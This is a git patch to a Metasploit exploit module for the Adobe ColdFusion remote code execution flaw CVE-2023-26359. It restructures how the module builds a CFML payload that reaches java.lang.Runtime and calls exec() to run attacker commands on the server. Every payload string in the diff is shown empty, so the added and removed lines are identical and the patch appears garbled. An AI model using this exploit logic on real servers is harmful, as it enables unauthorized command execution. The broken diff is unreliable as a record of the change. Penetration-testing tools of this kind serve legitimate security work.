From fa1e7ae0169c1929be06febfa2d036bd81607644 Mon Sep 17 00:00:00 2001 From: sfewer-r7 Date: Tue, 11 Apr 2023 11:22:13 +0100 Subject: [PATCH] close all CMFL tags and chain the getRuntime and exec calls for berevity --- .../http/adobe_coldfusion_rce_cve_2023_26359.rb | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb index f9ba176372..e2e4fe1e72 100644 --- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb +++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb @@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote cfc_payload = "" # Set our cf_param with the data in the requests form data, this is the command to run. - cfc_payload << "" + cfc_payload << "" # Here we construct a CFML payload to stage the :cmd and :dropper commands... shell_name = nil @@ -173,22 +173,15 @@ class MetasploitModule < Msf::Exploit::Remote cf_array = Rex::Text.rand_text_alpha_lower(4) # Create an array of arguments to pass to exec() - cfc_payload << "" + cfc_payload << "" cf_runtime = Rex::Text.rand_text_alpha_lower(4) # Get a reference to the java.lang.Runtime class. - cfc_payload << "" + cfc_payload << "" - cf_rt = Rex::Text.rand_text_alpha_lower(4) - - # Call the static getRuntime method. - cfc_payload << "" - - cf_res = Rex::Text.rand_text_alpha_lower(4) - - # Use exec() to execute our string array holding the command and the arguments. - cfc_payload << "" + # Call the static Runtime.exec method to execute our string array holding the command and the arguments. + cfc_payload << "" # The end of the If tag. cfc_payload << ''